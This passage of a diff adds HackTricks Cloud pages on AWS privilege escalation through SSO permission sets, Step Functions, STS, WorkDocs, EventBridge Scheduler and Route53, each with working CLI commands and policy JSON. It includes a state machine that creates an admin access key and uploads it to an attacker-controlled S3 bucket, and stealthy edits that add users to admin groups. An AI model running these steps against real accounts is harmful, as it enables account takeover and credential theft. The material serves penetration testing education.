overflow="wrap" %} +```bash +# Set AdministratorAccess policy to the permission set +aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" + +# Update the provisioning so the new policy is created in the account +aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS +``` +{% endcode %} + +### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` + +An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. 
+ +{% hint style="warning" %} +To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. +{% endhint %} + +{% code overflow="wrap" %} +```bash +# Set AdministratorAccess policy to the permission set +aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference + +# Update the provisioning so the new policy is created in the account +aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS +``` +{% endcode %} + +### `sso:CreateAccountAssignment` + +An attacker with this permission could give a Permission Set to a user under his control to an account. + +{% code overflow="wrap" %} +```bash +aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id +``` +{% endcode %} + +### `sso:GetRoleCredentials` + +Returns the STS short-term credentials for a given role name that is assigned to the user. + +{% code overflow="wrap" %} +``` +aws sso get-role-credentials --role-name --account-id --access-token +``` +{% endcode %} + +However, you need an access token that I'm not sure how to get (TODO). + +### `sso:DetachManagedPolicyFromPermissionSet` + +An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. + +{% code overflow="wrap" %} +```bash +aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn +``` +{% endcode %} + +### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` + +An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. 
It is possible to grant more privileges via **detaching a managed policy (deny policy)**. + +{% code overflow="wrap" %} +```bash +aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference +``` +{% endcode %} + +### `sso:DeleteInlinePolicyFromPermissionSet` + +An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. + +{% code overflow="wrap" %} +```bash +aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn +``` +{% endcode %} + +### `sso:DeletePermissionBoundaryFromPermissionSet` + +An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. + +{% code overflow="wrap" %} +```bash +aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md new file mode 100644 index 0000000000..4084a29726 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -0,0 +1,291 @@ +# AWS - Step Functions Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Step Functions + +For more information about this AWS service, check: + +{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} +[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) +{% endcontent-ref %} + +### Task Resources + +These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions. + +In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: + +
+ +Or you could also go to the API AWS documentation and check each action docs: + +* [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) +* [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) + +### `states:TestState` & `iam:PassRole` + +An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. + +{% code overflow="wrap" %} +```bash +aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] +``` +{% endcode %} + +The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. 
This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: + +* **stateDefinition.json**: + +```json +{ + "Type": "Task", + "Parameters": { + "UserName": "admin" + }, + "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", + "End": true +} +``` + +* **Command** executed to perform the privesc: + +{% code overflow="wrap" %} +```bash +aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole + +{ + "output": "{ + \"AccessKey\":{ + \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", + \"CreateDate\":\"2024-07-09T16:59:11Z\", + \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", + \"Status\":\"Active\", + \"UserName\":\"admin\" + } + }", + "status": "SUCCEEDED" +} +``` +{% endcode %} + +**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. + +### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`) + +An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. 
+ +{% code overflow="wrap" %} +```bash +# Create a state machine +aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ +[--tracing-configuration ] [--publish | --no-publish] [--version-description ] + +# Start a state machine execution +aws states start-execution --state-machine-arn [--name ] [--input ] [--trace-header ] + +# Start a Synchronous Express state machine execution +aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] +``` +{% endcode %} + +The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. 
+ +* **stateMachineDefinition.json**: + +```json +{ + "Comment": "Malicious state machine to create IAM access key and upload to S3", + "StartAt": "CreateAccessKey", + "States": { + "CreateAccessKey": { + "Type": "Task", + "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", + "Parameters": { + "UserName": "admin" + }, + "ResultPath": "$.AccessKeyResult", + "Next": "PrepareS3PutObject" + }, + "PrepareS3PutObject": { + "Type": "Pass", + "Parameters": { + "Body.$": "$.AccessKeyResult.AccessKey", + "Bucket": "attacker-controlled-S3-bucket", + "Key": "AccessKey.json" + }, + "ResultPath": "$.S3PutObjectParams", + "Next": "PutObject" + }, + "PutObject": { + "Type": "Task", + "Resource": "arn:aws:states:::aws-sdk:s3:putObject", + "Parameters": { + "Body.$": "$.S3PutObjectParams.Body", + "Bucket.$": "$.S3PutObjectParams.Bucket", + "Key.$": "$.S3PutObjectParams.Key" + }, + "End": true + } + } +} +``` + +* **Command** executed to **create the state machine**: + +{% code overflow="wrap" %} +```bash +aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole +{ + "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", + "creationDate": "2024-07-09T20:29:35.381000+02:00" +} +``` +{% endcode %} + +* **Command** executed to **start an execution** of the previously created state machine: + +{% code overflow="wrap" %} +```json +aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine +{ + "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "startDate": "2024-07-09T20:33:35.466000+02:00" +} +``` +{% endcode %} + +{% hint style="warning" %} +The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. 
+{% endhint %} + +**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. + +### `states:UpdateStateMachine` & (not always required) `iam:PassRole` + +An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. + +Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations: + +1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. +2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. + +{% code overflow="wrap" %} +```bash +aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ +[--tracing-configuration ] [--publish | --no-publish] [--version-description ] +``` +{% endcode %} + +The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. 
This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. + +{% hint style="warning" %} +If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). +{% endhint %} + +{% tabs %} +{% tab title="Legit State Machine" %} +```json +{ + "Comment": "Hello world from Lambda state machine", + "StartAt": "Start PassState", + "States": { + "Start PassState": { + "Type": "Pass", + "Next": "LambdaInvoke" + }, + "LambdaInvoke": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "Parameters": { + "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" + }, + "Next": "End PassState" + }, + "End PassState": { + "Type": "Pass", + "End": true + } + } +} +``` +{% endtab %} + +{% tab title="Malicious Updated State Machine" %} +```json +{ + "Comment": "Hello world from Lambda state machine", + "StartAt": "Start PassState", + "States": { + "Start PassState": { + "Type": "Pass", + "Next": "LambdaInvoke" + }, + "LambdaInvoke": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "Parameters": { + "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" + }, + "Next": "AddUserToGroup" + }, + "AddUserToGroup": { + "Type": "Task", + "Parameters": { + "GroupName": "administrator", + "UserName": "unprivilegedUser" + }, + "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", + "Next": "End PassState" + }, + "End PassState": { + "Type": "Pass", + "End": true + } + } +} +``` +{% endtab %} +{% endtabs %} + +* **Command** executed to **update** **the legit state machine**: + +{% code overflow="wrap" %} +```bash +aws stepfunctions 
update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json +{ + "updateDate": "2024-07-10T20:07:10.294000+02:00", + "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +``` +{% endcode %} + +**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md new file mode 100644 index 0000000000..1162ac6fef --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md @@ -0,0 +1,153 @@ +# AWS - STS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## STS + +### `sts:AssumeRole` + +Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). + +For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +You can impersonate a role running: + +```bash +aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname +``` + +**Potential Impact:** Privesc to the role. + +{% hint style="danger" %} +Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ +With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
+{% endhint %} + +### **`sts:GetFederationToken`** + +With this permission it's possible to generate credentials to impersonate any user: + +```bash +aws sts get-federation-token --name +``` + +This is how this permission can be given securely without giving access to impersonate other users: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "VisualEditor0", + "Effect": "Allow", + "Action": "sts:GetFederationToken", + "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" + } + ] +} +``` + +### `sts:AssumeRoleWithSAML` + +A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** + +An example of a trust policy with this permission is: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "OneLogin", + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" + }, + "Action": "sts:AssumeRoleWithSAML", + "Condition": { + "StringEquals": { + "SAML:aud": "https://signin.aws.amazon.com/saml" + } + } + } + ] +} +``` + +To generate credentials to impersonate the role in general you could use something like: + +```bash +aws sts assume-role-with-saml --role-arn --principal-arn +``` + +But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): + +{% code overflow="wrap" %} +```bash +onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 +``` +{% endcode %} + +**Potential Impact:** Privesc to the role. + +### `sts:AssumeRoleWithWebIdentity` + +This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. 
[Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) + +For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: + +{% code overflow="wrap" %} +```bash +aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token +# The role name can be found in the metadata of the configuration of the pod +``` +{% endcode %} + +### Federation Abuse + +{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %} +[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md new file mode 100644 index 0000000000..56e02e6001 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md 
@@ -0,0 +1,52 @@ +# AWS - WorkDocs Privesc + +## WorkDocs + +For more info about WorkDocs check: + +{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} +[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) +{% endcontent-ref %} + +### `workdocs:CreateUser` + +Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD: + +```bash +# Create user (created inside the AD) +aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password --email-address name@directory.domain --organization-id +``` + +### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)` + +The files might contain sensitive information, read them: + +```bash +# Get what was created in the directory +aws workdocs describe-activities --organization-id + +# Get what each user has created +aws workdocs describe-activities --user-id "S-1-5-21-377..." + +# Get file (a url to access with the content will be retreived) +aws workdocs get-document --document-id +``` + +### `workdocs:AddResourcePermissions` + +If you don't have access to read something, you can just grant it + +```bash +# Add permission so anyway can see the file +aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER +## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ +``` + +### `workdocs:AddUserToGroup` + +You can make a user admin by setting it in the group ZOCALO\_ADMIN.\ +For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html) + +Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` + +I didn't find any way to do this from the cli. 
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md new file mode 100644 index 0000000000..9173fadf5c --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -0,0 +1,75 @@ +# AWS - EventBridge Scheduler Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EventBridge Scheduler + +More info EventBridge Scheduler in: + +{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} +[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) +{% endcontent-ref %} + +### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) + +An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action + +For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: + +```bash +aws scheduler create-schedule \ + --name MyLambdaSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:lambda:::function:", + "RoleArn": "arn:aws:iam:::role/" + }' +``` + +In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. 
One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: + +```bash +aws scheduler create-schedule \ + --name GrantAdminToTargetRoleSchedule \ + --schedule-expression "rate(5 minutes)" \ + --flexible-time-window "Mode=OFF" \ + --target '{ + "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", + "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", + "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" + }' +``` + +## References + +* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) +* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md new file mode 100644 index 0000000000..4a13f8e5c1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md @@ -0,0 +1,59 @@ +# AWS - Route53 Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +For more information about Route53 check: + +{% content-ref url="../aws-services/aws-route53-enum.md" %} +[aws-route53-enum.md](../aws-services/aws-route53-enum.md) +{% endcontent-ref %} + +### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` + +{% hint style="info" %} +To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. +{% endhint %} + +Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` + +Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. + +This is possible because: + +* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) +* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names +* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. 
+ +#### Exploitation + +Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md new file mode 100644 index 0000000000..67243cb537 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/README.md @@ -0,0 +1,57 @@ +# AWS - Services + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
